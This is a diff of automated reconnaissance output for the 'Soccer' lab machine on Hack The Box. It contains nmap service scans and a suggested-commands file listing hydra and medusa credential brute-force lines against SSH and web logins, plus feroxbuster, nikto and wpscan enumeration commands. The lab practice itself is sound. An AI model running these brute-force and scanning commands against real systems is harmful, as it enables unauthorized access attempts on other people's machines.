+|     Date: Fri, 27 Jan 2023 09:41:51 GMT
+|     Connection: close
+|     <!DOCTYPE html>
+|     <html lang="en">
+|     <head>
+|     <meta charset="utf-8">
+|     <title>Error</title>
+|     </head>
+|     <body>
+|     <pre>Cannot GET /</pre>
+|     </body>
+|     </html>
+|   HTTPOptions, RTSPRequest: 
+|     HTTP/1.1 404 Not Found
+|     Content-Security-Policy: default-src 'none'
+|     X-Content-Type-Options: nosniff
+|     Content-Type: text/html; charset=utf-8
+|     Content-Length: 143
+|     Date: Fri, 27 Jan 2023 09:41:52 GMT
+|     Connection: close
+|     <!DOCTYPE html>
+|     <html lang="en">
+|     <head>
+|     <meta charset="utf-8">
+|     <title>Error</title>
+|     </head>
+|     <body>
+|     <pre>Cannot OPTIONS /</pre>
+|     </body>
+|_    </html>
+1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+SF-Port9091-TCP:V=7.93%I=9%D=1/27%Time=63D39C5A%P=x86_64-pc-linux-gnu%r(in
+SF:formix,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r
+SF:\n\r\n")%r(drda,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x
+SF:20close\r\n\r\n")%r(GetRequest,168,"HTTP/1\.1\x20404\x20Not\x20Found\r\
+SF:nContent-Security-Policy:\x20default-src\x20'none'\r\nX-Content-Type-Op
+SF:tions:\x20nosniff\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nCo
+SF:ntent-Length:\x20139\r\nDate:\x20Fri,\x2027\x20Jan\x202023\x2009:41:51\
+SF:x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang
+SF:=\"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>Error</title>\n</
+SF:head>\n<body>\n<pre>Cannot\x20GET\x20/</pre>\n</body>\n</html>\n")%r(HT
+SF:TPOptions,16C,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Pol
+SF:icy:\x20default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\n
+SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\
+SF:r\nDate:\x20Fri,\x2027\x20Jan\x202023\x2009:41:52\x20GMT\r\nConnection:
+SF:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<me
+SF:ta\x20charset=\"utf-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>C
+SF:annot\x20OPTIONS\x20/</pre>\n</body>\n</html>\n")%r(RTSPRequest,16C,"HT
+SF:TP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20default-s
+SF:rc\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20
+SF:text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nDate:\x20Fri,\
+SF:x2027\x20Jan\x202023\x2009:41:52\x20GMT\r\nConnection:\x20close\r\n\r\n
+SF:<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<meta\x20charset=\"u
+SF:tf-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>Cannot\x20OPTIONS\
+SF:x20/</pre>\n</body>\n</html>\n")%r(RPCCheck,2F,"HTTP/1\.1\x20400\x20Bad
+SF:\x20Request\r\nConnection:\x20close\r\n\r\n")%r(DNSVersionBindReqTCP,2F
+SF:,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%
+SF:r(DNSStatusRequestTCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnect
+SF:ion:\x20close\r\n\r\n")%r(Hello,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\
+SF:r\nConnection:\x20close\r\n\r\n")%r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x2
+SF:0Request\r\nConnection:\x20close\r\n\r\n");
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Fri Jan 27 10:42:22 2023 -- 1 IP address (1 host up) scanned in 50.63 seconds
--- a/HTB/soccer/results/scans/_manual_commands.txt
+++ b/HTB/soccer/results/scans/_manual_commands.txt
@@ -0,0 +1,32 @@
+[*] ssh on tcp/22
+
+	[-] Bruteforce logins:
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/soccer/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.10.11.194
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/soccer/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.10.11.194
+
+[*] http on tcp/80
+
+	[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
+
+		feroxbuster -u http://10.10.11.194:80 -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -e -o /home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
+
+	[-] Credential bruteforcing commands (don't run these without modifying them):
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.10.11.194/path/to/auth/area
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.10.11.194 -m DIR:/path/to/auth/area
+
+		hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.10.11.194/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
+
+		medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.10.11.194 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
+
+	[-] (nikto) old but generally reliable web server enumeration tool:
+
+		nikto -ask=no -h http://10.10.11.194:80 2>&1 | tee "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_nikto.txt"
+
+	[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
+
+		wpscan --url http://10.10.11.194:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/soccer/results/scans/tcp80/tcp_80_http_wpscan.txt"
+
--- a/HTB/soccer/results/scans/_patterns.log
+++ b/HTB/soccer/results/scans/_patterns.log
@@ -0,0 +1,8 @@
+Identified HTTP Server: nginx/1.18.0 (Ubuntu)
+
+Nmap script found a potential vulnerability. (State: VULNERABLE)
+
+CVE Identified: CVE-2011-3192
+
+CVE Identified: CVE-2011-3192
+
--- a/HTB/soccer/results/scans/_quick_tcp_nmap.txt
+++ b/HTB/soccer/results/scans/_quick_tcp_nmap.txt
@@ -0,0 +1,96 @@
+# Nmap 7.93 scan initiated Fri Jan 27 10:41:32 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/htb/soccer/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/soccer/results/scans/xml/_quick_tcp_nmap.xml 10.10.11.194
+Nmap scan report for soccer.htb (10.10.11.194)
+Host is up, received user-set (0.033s latency).
+Scanned at 2023-01-27 10:41:32 CET for 46s
+Not shown: 997 closed tcp ports (conn-refused)
+PORT     STATE SERVICE         REASON  VERSION
+22/tcp   open  ssh             syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChXu/2AxokRA9pcTIQx6HKyiO0odku5KmUpklDRNG+9sa6olMd4dSBq1d0rGtsO2rNJRLQUczml6+N5DcCasAZUShDrMnitsRvG54x8GrJyW4nIx4HOfXRTsNqImBadIJtvIww1L7H1DPzMZYJZj/oOwQHXvp85a2hMqMmoqsljtS/jO3tk7NUKA/8D5KuekSmw8m1pPEGybAZxlAYGu3KbasN66jmhf0ReHg3Vjx9e8FbHr3ksc/MimSMfRq0lIo5fJ7QAnbttM5ktuQqzvVjJmZ0+aL7ZeVewTXLmtkOxX9E5ldihtUFj8C6cQroX69LaaN/AXoEZWl/v1LWE5Qo1DEPrv7A6mIVZvWIM8/AqLpP8JWgAQevOtby5mpmhSxYXUgyii5xRAnvDWwkbwxhKcBIzVy4x5TXinVR7FrrwvKmNAG2t4lpDgmryBZ0YSgxgSAcHIBOglugehGZRHJC9C273hs44EToGCrHBY8n2flJe7OgbjEL8Il3SpfUEF0=
+|   256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk=
+|   256 5797565def793c2fcbdb35fff17c615c (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/
+80/tcp   open  http            syn-ack nginx 1.18.0 (Ubuntu)
+|_http-title: Soccer - Index 
+| http-methods: 
+|_  Supported Methods: GET HEAD
+|_http-server-header: nginx/1.18.0 (Ubuntu)
+9091/tcp open  xmltec-xmlmail? syn-ack
+| fingerprint-strings: 
+|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Hello, Help, RPCCheck, drda, informix: 
+|     HTTP/1.1 400 Bad Request
+|     Connection: close
+|   GetRequest: 
+|     HTTP/1.1 404 Not Found
+|     Content-Security-Policy: default-src 'none'
+|     X-Content-Type-Options: nosniff
+|     Content-Type: text/html; charset=utf-8
+|     Content-Length: 139
+|     Date: Fri, 27 Jan 2023 09:41:45 GMT
+|     Connection: close
+|     <!DOCTYPE html>
+|     <html lang="en">
+|     <head>
+|     <meta charset="utf-8">
+|     <title>Error</title>
+|     </head>
+|     <body>
+|     <pre>Cannot GET /</pre>
+|     </body>
+|     </html>
+|   HTTPOptions, RTSPRequest: 
+|     HTTP/1.1 404 Not Found
+|     Content-Security-Policy: default-src 'none'
+|     X-Content-Type-Options: nosniff
+|     Content-Type: text/html; charset=utf-8
+|     Content-Length: 143
+|     Date: Fri, 27 Jan 2023 09:41:45 GMT
+|     Connection: close
+|     <!DOCTYPE html>
+|     <html lang="en">
+|     <head>
+|     <meta charset="utf-8">
+|     <title>Error</title>
+|     </head>
+|     <body>
+|     <pre>Cannot OPTIONS /</pre>
+|     </body>
+|_    </html>
+1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+SF-Port9091-TCP:V=7.93%I=9%D=1/27%Time=63D39C53%P=x86_64-pc-linux-gnu%r(in
+SF:formix,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r
+SF:\n\r\n")%r(drda,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x
+SF:20close\r\n\r\n")%r(GetRequest,168,"HTTP/1\.1\x20404\x20Not\x20Found\r\
+SF:nContent-Security-Policy:\x20default-src\x20'none'\r\nX-Content-Type-Op
+SF:tions:\x20nosniff\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nCo
+SF:ntent-Length:\x20139\r\nDate:\x20Fri,\x2027\x20Jan\x202023\x2009:41:45\
+SF:x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang
+SF:=\"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>Error</title>\n</
+SF:head>\n<body>\n<pre>Cannot\x20GET\x20/</pre>\n</body>\n</html>\n")%r(HT
+SF:TPOptions,16C,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Pol
+SF:icy:\x20default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\n
+SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\
+SF:r\nDate:\x20Fri,\x2027\x20Jan\x202023\x2009:41:45\x20GMT\r\nConnection:
+SF:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<me
+SF:ta\x20charset=\"utf-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>C
+SF:annot\x20OPTIONS\x20/</pre>\n</body>\n</html>\n")%r(RTSPRequest,16C,"HT
+SF:TP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20default-s
+SF:rc\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20
+SF:text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nDate:\x20Fri,\
+SF:x2027\x20Jan\x202023\x2009:41:45\x20GMT\r\nConnection:\x20close\r\n\r\n
+SF:<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<meta\x20charset=\"u
+SF:tf-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>Cannot\x20OPTIONS\
+SF:x20/</pre>\n</body>\n</html>\n")%r(RPCCheck,2F,"HTTP/1\.1\x20400\x20Bad
+SF:\x20Request\r\nConnection:\x20close\r\n\r\n")%r(DNSVersionBindReqTCP,2F
+SF:,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%
+SF:r(DNSStatusRequestTCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnect
+SF:ion:\x20close\r\n\r\n")%r(Hello,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\
+SF:r\nConnection:\x20close\r\n\r\n")%r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x2
+SF:0Request\r\nConnection:\x20close\r\n\r\n");
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Fri Jan 27 10:42:18 2023 -- 1 IP address (1 host up) scanned in 46.59 seconds
--- a/HTB/soccer/results/scans/tcp22/tcp_22_ssh_nmap.txt
+++ b/HTB/soccer/results/scans/tcp22/tcp_22_ssh_nmap.txt
@@ -0,0 +1,62 @@
+# Nmap 7.93 scan initiated Fri Jan 27 10:42:19 2023 as: nmap -vv --reason -Pn -T4 -sV -p 22 --script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/soccer/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/soccer/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.194
+Nmap scan report for soccer.htb (10.10.11.194)
+Host is up, received user-set (0.077s latency).
+Scanned at 2023-01-27 10:42:19 CET for 1s
+
+PORT   STATE SERVICE REASON  VERSION
+22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey: 
+|   3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChXu/2AxokRA9pcTIQx6HKyiO0odku5KmUpklDRNG+9sa6olMd4dSBq1d0rGtsO2rNJRLQUczml6+N5DcCasAZUShDrMnitsRvG54x8GrJyW4nIx4HOfXRTsNqImBadIJtvIww1L7H1DPzMZYJZj/oOwQHXvp85a2hMqMmoqsljtS/jO3tk7NUKA/8D5KuekSmw8m1pPEGybAZxlAYGu3KbasN66jmhf0ReHg3Vjx9e8FbHr3ksc/MimSMfRq0lIo5fJ7QAnbttM5ktuQqzvVjJmZ0+aL7ZeVewTXLmtkOxX9E5ldihtUFj8C6cQroX69LaaN/AXoEZWl/v1LWE5Qo1DEPrv7A6mIVZvWIM8/AqLpP8JWgAQevOtby5mpmhSxYXUgyii5xRAnvDWwkbwxhKcBIzVy4x5TXinVR7FrrwvKmNAG2t4lpDgmryBZ0YSgxgSAcHIBOglugehGZRHJC9C273hs44EToGCrHBY8n2flJe7OgbjEL8Il3SpfUEF0=
+|   256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk=
+|   256 5797565def793c2fcbdb35fff17c615c (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/
+|_banner: SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5
+| ssh2-enum-algos: 
+|   kex_algorithms: (9)
+|       curve25519-sha256
+|       curve25519-sha256@libssh.org
+|       ecdh-sha2-nistp256
+|       ecdh-sha2-nistp384
+|       ecdh-sha2-nistp521
+|       diffie-hellman-group-exchange-sha256
+|       diffie-hellman-group16-sha512
+|       diffie-hellman-group18-sha512
+|       diffie-hellman-group14-sha256
+|   server_host_key_algorithms: (5)
+|       rsa-sha2-512
+|       rsa-sha2-256
+|       ssh-rsa
+|       ecdsa-sha2-nistp256
+|       ssh-ed25519
+|   encryption_algorithms: (6)
+|       chacha20-poly1305@openssh.com
+|       aes128-ctr
+|       aes192-ctr
+|       aes256-ctr
+|       aes128-gcm@openssh.com
+|       aes256-gcm@openssh.com
+|   mac_algorithms: (10)
+|       umac-64-etm@openssh.com
+|       umac-128-etm@openssh.com
+|       hmac-sha2-256-etm@openssh.com
+|       hmac-sha2-512-etm@openssh.com
+|       hmac-sha1-etm@openssh.com
+|       umac-64@openssh.com
+|       umac-128@openssh.com
+|       hmac-sha2-256
+|       hmac-sha2-512
+|       hmac-sha1
+|   compression_algorithms: (2)
+|       none
+|_      zlib@openssh.com
+| ssh-auth-methods: 
+|   Supported authentication methods: 
+|     publickey
+|_    password
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Read data files from: /usr/bin/../share/nmap
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+# Nmap done at Fri Jan 27 10:42:20 2023 -- 1 IP address (1 host up) scanned in 1.54 seconds
--- a/HTB/soccer/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml
+++ b/HTB/soccer/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml
@@ -0,0 +1,100 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE nmaprun>
+<?xml-stylesheet href="file:///usr/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
+<!-- Nmap 7.93 scan initiated Fri Jan 27 10:42:19 2023 as: nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/soccer/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/soccer/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.194 -->
+<nmaprun scanner="nmap" args="nmap -vv -&#45;reason -Pn -T4 -sV -p 22 -&#45;script=banner,ssh2-enum-algos,ssh-hostkey,ssh-auth-methods -oN /home/kali/htb/soccer/results/scans/tcp22/tcp_22_ssh_nmap.txt -oX /home/kali/htb/soccer/results/scans/tcp22/xml/tcp_22_ssh_nmap.xml 10.10.11.194" start="1674812539" startstr="Fri Jan 27 10:42:19 2023" version="7.93" xmloutputversion="1.05">
+<scaninfo type="connect" protocol="tcp" numservices="1" services="22"/>
+<verbose level="2"/>
+<debugging level="0"/>
+<taskbegin task="NSE" time="1674812539"/>
+<taskend task="NSE" time="1674812539"/>
+<taskbegin task="NSE" time="1674812539"/>
+<taskend task="NSE" time="1674812539"/>
+<taskbegin task="Connect Scan" time="1674812539"/>
+<taskend task="Connect Scan" time="1674812539" extrainfo="1 total ports"/>
+<taskbegin task="Service scan" time="1674812539"/>
+<taskend task="Service scan" time="1674812539" extrainfo="1 service on 1 host"/>
+<taskbegin task="NSE" time="1674812539"/>
+<taskend task="NSE" time="1674812540"/>
+<taskbegin task="NSE" time="1674812540"/>
+<taskend task="NSE" time="1674812540"/>
+<host starttime="1674812539" endtime="1674812540"><status state="up" reason="user-set" reason_ttl="0"/>
+<address addr="10.10.11.194" addrtype="ipv4"/>
+<hostnames>
+<hostname name="soccer.htb" type="PTR"/>
+</hostnames>
+<ports><port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh" product="OpenSSH" version="8.2p1 Ubuntu 4ubuntu0.5" extrainfo="Ubuntu Linux; protocol 2.0" ostype="Linux" method="probed" conf="10"><cpe>cpe:/a:openbsd:openssh:8.2p1</cpe><cpe>cpe:/o:linux:linux_kernel</cpe></service><script id="ssh-hostkey" output="&#xa;  3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)&#xa;ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQChXu/2AxokRA9pcTIQx6HKyiO0odku5KmUpklDRNG+9sa6olMd4dSBq1d0rGtsO2rNJRLQUczml6+N5DcCasAZUShDrMnitsRvG54x8GrJyW4nIx4HOfXRTsNqImBadIJtvIww1L7H1DPzMZYJZj/oOwQHXvp85a2hMqMmoqsljtS/jO3tk7NUKA/8D5KuekSmw8m1pPEGybAZxlAYGu3KbasN66jmhf0ReHg3Vjx9e8FbHr3ksc/MimSMfRq0lIo5fJ7QAnbttM5ktuQqzvVjJmZ0+aL7ZeVewTXLmtkOxX9E5ldihtUFj8C6cQroX69LaaN/AXoEZWl/v1LWE5Qo1DEPrv7A6mIVZvWIM8/AqLpP8JWgAQevOtby5mpmhSxYXUgyii5xRAnvDWwkbwxhKcBIzVy4x5TXinVR7FrrwvKmNAG2t4lpDgmryBZ0YSgxgSAcHIBOglugehGZRHJC9C273hs44EToGCrHBY8n2flJe7OgbjEL8Il3SpfUEF0=&#xa;  256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)&#xa;ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk=&#xa;  256 5797565def793c2fcbdb35fff17c615c (ED25519)&#xa;ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/"><table>
+<elem key="key">AAAAB3NzaC1yc2EAAAADAQABAAABgQChXu/2AxokRA9pcTIQx6HKyiO0odku5KmUpklDRNG+9sa6olMd4dSBq1d0rGtsO2rNJRLQUczml6+N5DcCasAZUShDrMnitsRvG54x8GrJyW4nIx4HOfXRTsNqImBadIJtvIww1L7H1DPzMZYJZj/oOwQHXvp85a2hMqMmoqsljtS/jO3tk7NUKA/8D5KuekSmw8m1pPEGybAZxlAYGu3KbasN66jmhf0ReHg3Vjx9e8FbHr3ksc/MimSMfRq0lIo5fJ7QAnbttM5ktuQqzvVjJmZ0+aL7ZeVewTXLmtkOxX9E5ldihtUFj8C6cQroX69LaaN/AXoEZWl/v1LWE5Qo1DEPrv7A6mIVZvWIM8/AqLpP8JWgAQevOtby5mpmhSxYXUgyii5xRAnvDWwkbwxhKcBIzVy4x5TXinVR7FrrwvKmNAG2t4lpDgmryBZ0YSgxgSAcHIBOglugehGZRHJC9C273hs44EToGCrHBY8n2flJe7OgbjEL8Il3SpfUEF0=</elem>
+<elem key="bits">3072</elem>
+<elem key="fingerprint">ad0d84a3fdcc98a478fef94915dae16d</elem>
+<elem key="type">ssh-rsa</elem>
+</table>
+<table>
+<elem key="key">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk=</elem>
+<elem key="bits">256</elem>
+<elem key="fingerprint">dfd6a39f68269dfc7c6a0c29e961f00c</elem>
+<elem key="type">ecdsa-sha2-nistp256</elem>
+</table>
+<table>
+<elem key="key">AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/</elem>
+<elem key="bits">256</elem>
+<elem key="fingerprint">5797565def793c2fcbdb35fff17c615c</elem>
+<elem key="type">ssh-ed25519</elem>
+</table>
+</script><script id="banner" output="SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5"/><script id="ssh2-enum-algos" output="&#xa;  kex_algorithms: (9)&#xa;      curve25519-sha256&#xa;      curve25519-sha256@libssh.org&#xa;      ecdh-sha2-nistp256&#xa;      ecdh-sha2-nistp384&#xa;      ecdh-sha2-nistp521&#xa;      diffie-hellman-group-exchange-sha256&#xa;      diffie-hellman-group16-sha512&#xa;      diffie-hellman-group18-sha512&#xa;      diffie-hellman-group14-sha256&#xa;  server_host_key_algorithms: (5)&#xa;      rsa-sha2-512&#xa;      rsa-sha2-256&#xa;      ssh-rsa&#xa;      ecdsa-sha2-nistp256&#xa;      ssh-ed25519&#xa;  encryption_algorithms: (6)&#xa;      chacha20-poly1305@openssh.com&#xa;      aes128-ctr&#xa;      aes192-ctr&#xa;      aes256-ctr&#xa;      aes128-gcm@openssh.com&#xa;      aes256-gcm@openssh.com&#xa;  mac_algorithms: (10)&#xa;      umac-64-etm@openssh.com&#xa;      umac-128-etm@openssh.com&#xa;      hmac-sha2-256-etm@openssh.com&#xa;      hmac-sha2-512-etm@openssh.com&#xa;      hmac-sha1-etm@openssh.com&#xa;      umac-64@openssh.com&#xa;      umac-128@openssh.com&#xa;      hmac-sha2-256&#xa;      hmac-sha2-512&#xa;      hmac-sha1&#xa;  compression_algorithms: (2)&#xa;      none&#xa;      zlib@openssh.com"><table key="kex_algorithms">
+<elem>curve25519-sha256</elem>
+<elem>curve25519-sha256@libssh.org</elem>
+<elem>ecdh-sha2-nistp256</elem>
+<elem>ecdh-sha2-nistp384</elem>
+<elem>ecdh-sha2-nistp521</elem>
+<elem>diffie-hellman-group-exchange-sha256</elem>
+<elem>diffie-hellman-group16-sha512</elem>
+<elem>diffie-hellman-group18-sha512</elem>
+<elem>diffie-hellman-group14-sha256</elem>
+</table>
+<table key="server_host_key_algorithms">
+<elem>rsa-sha2-512</elem>
+<elem>rsa-sha2-256</elem>
+<elem>ssh-rsa</elem>
+<elem>ecdsa-sha2-nistp256</elem>
+<elem>ssh-ed25519</elem>
+</table>
+<table key="encryption_algorithms">
+<elem>chacha20-poly1305@openssh.com</elem>
+<elem>aes128-ctr</elem>
+<elem>aes192-ctr</elem>
+<elem>aes256-ctr</elem>
+<elem>aes128-gcm@openssh.com</elem>
+<elem>aes256-gcm@openssh.com</elem>
+</table>
+<table key="mac_algorithms">
+<elem>umac-64-etm@openssh.com</elem>
+<elem>umac-128-etm@openssh.com</elem>
+<elem>hmac-sha2-256-etm@openssh.com</elem>
+<elem>hmac-sha2-512-etm@openssh.com</elem>
+<elem>hmac-sha1-etm@openssh.com</elem>
+<elem>umac-64@openssh.com</elem>
+<elem>umac-128@openssh.com</elem>
+<elem>hmac-sha2-256</elem>
+<elem>hmac-sha2-512</elem>
+<elem>hmac-sha1</elem>
+</table>
+<table key="compression_algorithms">
+<elem>none</elem>
+<elem>zlib@openssh.com</elem>
+</table>
+</script><script id="ssh-auth-methods" output="&#xa;  Supported authentication methods: &#xa;    publickey&#xa;    password"><table key="Supported authentication methods">
+<elem>publickey</elem>
+<elem>password</elem>
+</table>
+</script></port>
+</ports>
+<times srtt="77357" rttvar="77357" to="386785"/>
+</host>
+<taskbegin task="NSE" time="1674812540"/>
+<taskend task="NSE" time="1674812540"/>
+<taskbegin task="NSE" time="1674812540"/>
+<taskend task="NSE" time="1674812540"/>
+<runstats><finished time="1674812540" timestr="Fri Jan 27 10:42:20 2023" summary="Nmap done at Fri Jan 27 10:42:20 2023; 1 IP address (1 host up) scanned in 1.54 seconds" elapsed="1.54" exit="success"/><hosts up="1" down="0" total="1"/>
+</runstats>
+</nmaprun>
--- a/HTB/soccer/results/scans/tcp80/tcp_80_http_curl-robots.txt
+++ b/HTB/soccer/results/scans/tcp80/tcp_80_http_curl-robots.txt
@@ -0,0 +1,15 @@
+HTTP/1.1 301 Moved Permanently
+Server: nginx/1.18.0 (Ubuntu)
+Date: Fri, 27 Jan 2023 09:42:19 GMT
+Content-Type: text/html
+Content-Length: 178
+Connection: keep-alive
+Location: http://soccer.htb/robots.txt
+
+<html>
+<head><title>301 Moved Permanently</title></head>
+<body>
